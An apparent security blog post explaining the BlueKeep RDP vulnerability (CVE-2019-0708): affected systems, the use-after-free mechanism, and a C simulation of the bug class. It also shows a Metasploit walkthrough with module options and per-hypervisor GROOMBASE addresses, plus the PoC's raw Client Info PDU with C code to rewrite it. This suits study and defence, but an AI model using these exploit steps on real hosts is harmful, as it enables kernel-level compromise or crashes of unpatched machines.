BlueKeep, the 2019 EternalBlue
We had a discussion about which vulnerability of 2019 was the most critical.
After a heated debate we asked some friends and managed to cherry-pick one.
The chosen one is BlueKeep.
Summary:
BlueKeep is one of the most notorious software security vulnerabilities
of 2019. It was reported to Microsoft by the United Kingdom's
National Cyber Security Centre (NCSC) and publicly disclosed by Microsoft on
14 May 2019 as a critical, pre-authentication vulnerability in Remote Desktop
Services (the RDP server). Microsoft described it as wormable: an exploit needs
no valid credentials and no user interaction, so it can spread from one
vulnerable host to the next on its own, which is why it drew comparisons with
EternalBlue.
Microsoft considered the vulnerability so serious that it released patches even
for the out-of-support systems Windows XP and Windows Server 2003.
Affected:
- Windows 7
- Windows Server 2008 R2
- Windows Server 2008
- Windows Vista
- Windows Server 2003
- Windows XP
on systems that have Remote Desktop Services (RDP) enabled. Windows 8 and
later and Windows Server 2012 and later are not affected.
The vulnerability has been assigned CVE-2019-0708.
Explanation of the vulnerability
This is a use-after-free in the kernel-mode RDP driver (termdd.sys), reachable
before authentication, that can be exploited by:
- Opening an RDP connection that requests the MS_T120 virtual channel, a channel
  the server normally creates only for its own internal use.
- Starting a heap spray so that attacker-controlled data is waiting where the
  freed object used to live.
- Triggering further allocations through ExAllocatePoolWithTag in
  IcaChannelInputInternal so that the freed memory is reoccupied by our data.
- Taking control of the instruction pointer (EIP on 32-bit Windows, RIP on x64;
  the register that holds the address of the next instruction to execute).
- Triggering the use of the freed object so the kernel calls into our data and
  runs ring 0 (kernel-mode) shellcode.
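The sequence above is easier to reason about on a small model than on the real driver. The following is an added example written for this page, not code from termdd.sys, Metasploit or any PoC: a constructed userspace model of the bug class. A channel table ends up holding two references to one object (the internal MS_T120 channel at its reserved index, and the same object at a client-chosen index); closing the client's copy frees the object but leaves the other reference dangling; a spray refills the freed slot with attacker data; the server then calls a function pointer through the stale reference. The fixed-slot pool, the index 31 constant, the handler names and the `patched` switch (which mirrors the published description of the fix, refusing a client binding of MS_T120 anywhere but its reserved index) are all assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the CVE-2019-0708 bug class (not termdd.sys code; all
 * names illustrative). A fixed-slot pool stands in for the kernel pool and
 * makes the reuse deterministic, which is what GROOMBASE grooming achieves
 * on a real kernel. */

#define MAX_CHANNELS  32
#define MS_T120_INDEX 31      /* reserved index of the internal channel (assumed) */
#define POOL_SLOTS    4

typedef struct channel {
    void (*on_input)(struct channel *self);   /* called when data arrives */
    char name[16];
    int  in_use;
} channel_t;

static channel_t pool[POOL_SLOTS];
static int g_benign_calls, g_hijacked_calls;

static channel_t *pool_alloc(void) {
    for (int i = 0; i < POOL_SLOTS; i++) {
        if (!pool[i].in_use) {
            memset(&pool[i], 0, sizeof pool[i]);
            pool[i].in_use = 1;
            return &pool[i];
        }
    }
    return NULL;
}

/* Freed memory keeps its contents until someone reallocates the slot. */
static void pool_free(channel_t *c) { c->in_use = 0; }

static void benign_handler(channel_t *c)   { (void)c; g_benign_calls++; }
static void hijacked_handler(channel_t *c) { (void)c; g_hijacked_calls++; }  /* stands in for ring 0 shellcode */

typedef struct { channel_t *table[MAX_CHANNELS]; } session_t;

/* The server creates MS_T120 itself, before the client names any channel. */
static void session_init(session_t *s) {
    memset(s, 0, sizeof *s);
    channel_t *c = pool_alloc();
    c->on_input = benign_handler;
    strcpy(c->name, "MS_T120");
    s->table[MS_T120_INDEX] = c;
}

/* Bind a client-requested static channel. Unpatched, the reserved name is
 * looked up and aliased into the client's index (the double reference);
 * patched, MS_T120 is accepted only at its reserved index. */
static int bind_channel(session_t *s, const char *name, int idx, int patched) {
    if (idx < 0 || idx >= MAX_CHANNELS) return -1;
    if (strcmp(name, "MS_T120") == 0) {
        if (patched && idx != MS_T120_INDEX) return -1;
        s->table[idx] = s->table[MS_T120_INDEX];
        return 0;
    }
    channel_t *c = pool_alloc();
    if (!c) return -1;
    c->on_input = benign_handler;
    strncpy(c->name, name, sizeof c->name - 1);
    s->table[idx] = c;
    return 0;
}

/* Client closes its channel: the object is freed and only this slot cleared. */
static void close_channel(session_t *s, int idx) {
    if (s->table[idx]) { pool_free(s->table[idx]); s->table[idx] = NULL; }
}

/* Spray: allocate until every free slot, the just-freed one included, holds
 * an object whose function pointer the attacker chose. */
static void spray(void) {
    channel_t *c;
    while ((c = pool_alloc()) != NULL) {
        c->on_input = hijacked_handler;
        strcpy(c->name, "SPRAY");
    }
}

/* Server-side dispatch through the reserved index, i.e. the stale reference. */
static void dispatch_internal(session_t *s) {
    channel_t *c = s->table[MS_T120_INDEX];
    if (c) c->on_input(c);
}

/* Runs the full sequence; returns 1 if the attacker's handler ran. */
static int run_scenario(int patched) {
    memset(pool, 0, sizeof pool);
    g_benign_calls = g_hijacked_calls = 0;
    session_t s;
    session_init(&s);
    if (bind_channel(&s, "MS_T120", 3, patched) == 0)  /* client asks for MS_T120 at index 3 */
        close_channel(&s, 3);                          /* free it through the client's reference */
    spray();
    dispatch_internal(&s);
    return g_hijacked_calls > 0;
}

int main(void) {
    printf("unpatched: attacker handler ran = %d\n", run_scenario(0));
    printf("patched:   attacker handler ran = %d\n", run_scenario(1));
    return 0;
}
```

Unpatched, `run_scenario(0)` reports that the attacker's handler ran: the slot freed through index 3 was handed back out by the spray and the server called through index 31 into it. With the bind check in place the duplicate reference is never created, there is nothing to free early, and the dispatch reaches the benign handler. On a real kernel the spray has to land attacker data at a predictable pool address instead of a fixed slot, which is what the per-environment GROOMBASE values in the Metasploit module are about.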
Proof of concept
Rapid7 has added an exploit module for BlueKeep to Metasploit, an important
milestone for the framework: it is Metasploit's first Windows RDP exploit.
You can download the module here and try it in msfconsole. The scanner module
only checks whether a host is vulnerable, while the exploit module is ranked
"manual" because its kernel pool address (GROOMBASE) is specific to the Windows
build and to the hypervisor the target runs on, and a wrong choice crashes the
target rather than giving a shell.
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/rdp# pwd
/usr/share/metasploit-framework/modules/exploits/windows/rdp
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/rdp# wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...

       =[ metasploit v5.0.46-dev                          ]
+ -- --=[ 1922 exploits - 1074 auxiliary - 330 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 4 evasion                                       ]

msf5 >
msf5 > search bluekeep

Matching Modules
================

   #  Name                                            Disclosure Date  Rank    Check  Description
   -  ----                                            ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
root@kali:~# cat -n /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
   106          # Windows 2008 R2 requires the following registry change from default:
   107          #
   108          # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
   109          # "fDisableCam"=dword:00000000
   110          #
   111          [
   112            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
   113            {
   114              'Platform' => 'win',
   115              'Arch' => [ARCH_X64],
   116              'GROOMBASE' => 0xfffffa8003800000
   117            }
   118          ],
   119          [
   120            # This works with Virtualbox 6
   121            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)',
   122            {
   123              'Platform' => 'win',
   124              'Arch' => [ARCH_X64],
   125              'GROOMBASE' => 0xfffffa8002407000
   126            }
   127          ],
   128          [
   129            # This address works on VMWare 15 on Windows.
   130            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)',
   131            {
   132              'Platform' => 'win',
   133              'Arch' => [ARCH_X64],
   134              'GROOMBASE' => 0xfffffa8018C00000
   135              #'GROOMBASE' => 0xfffffa801C000000
   136            }
   137          ],
   138          [
   139            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
   140            {
   141              'Platform' => 'win',
   142              'Arch' => [ARCH_X64],
   143              'GROOMBASE' => 0xfffffa8102407000
   144            }
   145          ],
   146        ],
Each target hard-codes GROOMBASE, the base address of the kernel non-paged pool
(NPP) that the exploit grooms, which is why the same Windows build has separate
entries for bare metal, VirtualBox, VMware and Hyper-V. At the time of writing
the only targets are Windows 7 SP1 and Windows Server 2008 R2 x64; the community
is working on adding NPP addresses for more Windows builds and environments.
Pentest-tools.com has written a guide on how to get the exploit working.
Blue screen of death PoC
A proof of concept was published at github.com/Ekultek/BlueKeep that, when run
against a vulnerable host, crashes the kernel and causes a blue screen of death.
It demonstrates the bug as a denial of service rather than as code execution,
so expect to reboot the target.
Log files
When the PoC script runs it sends the following Client Info PDU, the packet
that carries the username, password and client details during the RDP
connection sequence (all strings are UTF-16LE):
https://github.com/Ekultek/BlueKeep/blob/master/bluekeep_poc.py#L119
def client_info_pdu():
    # TPKT + X.224 + MCS Send Data Request + security header (SEC_INFO_PKT) +
    # TS_INFO_PACKET. The header declares cbUserName = 0x000e (14 bytes), and the
    # bytes 42007200770041006600660079 at the end of the first line are the
    # UTF-16LE username "BrwAffy". As a test we changed the username to "firo":
    # "firo" is 6669726f in ASCII, which becomes 6600690072006f00 in UTF-16LE, and
    # to keep the 13-byte run the same length we padded it to
    # 6600690072006f000d000a0000, so the length fields stay valid. The first line
    # then reads
    # 0300016102f08064000703eb7081524000a1a509040904bb47030000000e0008000000000000006600690072006f000d000a0000
    packet = (
        "0300016102f08064000703eb7081524000a1a509040904bb47030000000e00080000000000000042007200770041006600660079"  # headers, length fields, username "BrwAffy"
        "000000740074007400740000000000000002001c00310030002e0030002e0030002e003700360000000000000000000000400043"  # password "tttt", AF_INET, client address "10.0.0.76", cbClientDir, "C"
        "003a005c00570049004e0044004f00570053005c00730079007300740065006d00330032005c006d007300740073006300610078"  # ":\WINDOWS\system32\mstscax"
        "002e0064006c006c000000a40100004d006f0075006e007400610069006e0020005300740061006e006400610072006400200054"  # ".dll", time zone bias, "Mountain Standard T"
        "0069006d006500000000000000000000000000000000000000000000000b00000001000200000000000000000000004d006f0075"  # "ime", standard date
        "006e007400610069006e0020004400610079006c0069006700680074002000540069006d00650000000000000000000000000000"  # "Mountain Daylight Time"
        "0000000000000000000300000002000200000000000000c4ffffff0100000006000000000064000000"  # daylight date and bias, trailing fields
    )
    return bytes.fromhex(packet)
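Padding the replacement username to the same byte count works, but it is a workaround: the PDU carries three length fields that a different-length username must update (cbUserName in TS_INFO_PACKET, the MCS user-data length, and the TPKT length). The following is an added example written for this page, not code from the Ekultek PoC or from any RDP library, that parses the captured PDU above, recovers the username, and rebuilds the packet with a new username while fixing up all three lengths. It assumes the exact layout of this capture (no Domain, AlternateShell or WorkingDir strings; the MCS length encoded in the two-byte 0x81xx form), and the offset constants and function names are its own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example: parse and rewrite the captured Client Info PDU. Offsets are
 * for this capture only (TPKT 4 + X.224 3 + MCS SDrq 8 + security header 4). */

/* The 353-byte PDU from the PoC, exactly as captured on the page. */
static const char CLIENT_INFO_HEX[] =
    "0300016102f08064000703eb7081524000a1a509040904bb47030000000e00080000000000000042007200770041006600660079"
    "000000740074007400740000000000000002001c00310030002e0030002e0030002e003700360000000000000000000000400043"
    "003a005c00570049004e0044004f00570053005c00730079007300740065006d00330032005c006d007300740073006300610078"
    "002e0064006c006c000000a40100004d006f0075006e007400610069006e0020005300740061006e006400610072006400200054"
    "0069006d006500000000000000000000000000000000000000000000000b00000001000200000000000000000000004d006f0075"
    "006e007400610069006e0020004400610079006c0069006700680074002000540069006d00650000000000000000000000000000"
    "0000000000000000000300000002000200000000000000c4ffffff0100000006000000000064000000";

enum {
    OFF_TPKT_LEN = 2,               /* TPKT length, big-endian, whole packet */
    OFF_MCS_LEN  = 13,              /* MCS userData length, 0x8000 | len, big-endian */
    OFF_INFO     = 19,              /* start of TS_INFO_PACKET */
    OFF_CB_USER  = OFF_INFO + 10,   /* cbUserName, little-endian */
    OFF_STRINGS  = OFF_INFO + 18    /* Domain string (here just its NUL) */
};

static size_t hex_decode(const char *hex, uint8_t *out, size_t cap) {
    size_t n = strlen(hex) / 2;
    if (n > cap) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned v;
        if (sscanf(hex + 2 * i, "%2x", &v) != 1) return 0;
        out[i] = (uint8_t)v;
    }
    return n;
}

static unsigned rd16le(const uint8_t *p) { return p[0] | (p[1] << 8); }
static unsigned rd16be(const uint8_t *p) { return (p[0] << 8) | p[1]; }
static void wr16le(uint8_t *p, unsigned v) { p[0] = v & 0xff; p[1] = v >> 8; }
static void wr16be(uint8_t *p, unsigned v) { p[0] = v >> 8; p[1] = v & 0xff; }

/* Decode a UTF-16LE field of cb bytes into ASCII; non-ASCII code units become '?'. */
static void utf16le_to_ascii(const uint8_t *p, unsigned cb, char *out, size_t cap) {
    size_t n = 0;
    for (unsigned i = 0; i + 1 < cb && n + 1 < cap; i += 2)
        out[n++] = (p[i + 1] == 0 && p[i] < 0x80) ? (char)p[i] : '?';
    out[n] = 0;
}

/* Extract UserName. Returns 0 on success, -1 if the length fields disagree. */
static int get_username(const uint8_t *pdu, size_t len, char *out, size_t cap) {
    if (len < OFF_STRINGS + 2 || rd16be(pdu + OFF_TPKT_LEN) != len) return -1;
    if ((rd16be(pdu + OFF_MCS_LEN) & 0x3fff) != len - 15) return -1;
    unsigned cb_domain = rd16le(pdu + OFF_INFO + 8);
    unsigned cb_user   = rd16le(pdu + OFF_CB_USER);
    size_t user_off = OFF_STRINGS + cb_domain + 2;     /* skip Domain and its NUL */
    if (user_off + cb_user + 2 > len) return -1;
    utf16le_to_ascii(pdu + user_off, cb_user, out, cap);
    return 0;
}

static int username_is(const uint8_t *pdu, size_t len, const char *expect) {
    char name[64];
    return get_username(pdu, len, name, sizeof name) == 0 && strcmp(name, expect) == 0;
}

/* Rebuild the PDU with a new ASCII username, updating cbUserName, the MCS
 * length and the TPKT length. Returns the new length, 0 on error. */
static size_t set_username(const uint8_t *pdu, size_t len, const char *user,
                           uint8_t *out, size_t cap) {
    if (len < OFF_STRINGS + 2) return 0;
    unsigned cb_domain = rd16le(pdu + OFF_INFO + 8);
    unsigned cb_old    = rd16le(pdu + OFF_CB_USER);
    size_t user_off = OFF_STRINGS + cb_domain + 2;
    size_t cb_new   = strlen(user) * 2;
    size_t new_len  = len - cb_old + cb_new;
    if (user_off + cb_old + 2 > len || new_len > cap || new_len - 15 > 0x3fff) return 0;
    memcpy(out, pdu, user_off);
    for (size_t i = 0; user[i]; i++) {            /* ASCII -> UTF-16LE */
        out[user_off + 2 * i] = (uint8_t)user[i];
        out[user_off + 2 * i + 1] = 0;
    }
    memcpy(out + user_off + cb_new, pdu + user_off + cb_old, len - user_off - cb_old);
    wr16le(out + OFF_CB_USER, (unsigned)cb_new);
    wr16be(out + OFF_TPKT_LEN, (unsigned)new_len);
    wr16be(out + OFF_MCS_LEN, 0x8000 | (unsigned)(new_len - 15));
    return new_len;
}

int main(void) {
    uint8_t pdu[512], mod[512];
    char name[64];
    size_t len = hex_decode(CLIENT_INFO_HEX, pdu, sizeof pdu);
    if (get_username(pdu, len, name, sizeof name) == 0)
        printf("captured PDU: %zu bytes, username \"%s\"\n", len, name);
    size_t n = set_username(pdu, len, "firo", mod, sizeof mod);
    if (n && get_username(mod, n, name, sizeof name) == 0)
        printf("rewritten PDU: %zu bytes, username \"%s\"\n", n, name);
    return 0;
}
```

`get_username` refuses a packet whose TPKT or MCS length does not match the buffer, which is exactly the check that catches a hand-edited username of the wrong length; `set_username` produces a 347-byte PDU for "firo" (14 username bytes out, 8 in) with all three length fields consistent, so no padding is needed.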
Scammers profiting off the vulnerability
Several websites claim to sell a working exploit for this vulnerability,
for example:
rdpexploit[.]com
cve-2019-0708[.]info
buyexploit[.]com
None of them has shown anything that backs the claim; treat them as scams.
Vulnerable hosts
Robert David Graham has released a scanner (rdpscan) for detecting this
vulnerability and published a blog post reporting that almost one million
(about 950,000) internet-facing hosts are vulnerable.
Read it here
External links:
EternalBlue
Microsoft CVE-2019-0708 advisory
National Cyber Security Centre vulnerability announcement
Zero Day Initiative's write-up
Packet Storm Security CVE-2019-0708
Sophos BlueKeep PoC
CVE-2019-0708 on vulmon
Algo7 PoC
Windows protection rings
Metasploit pull request #12283 for BlueKeep
Metasploit announces the release of the BlueKeep module
This blog post is part of the Exploit of the Day series, in which we write
short descriptions of interesting exploits that we index.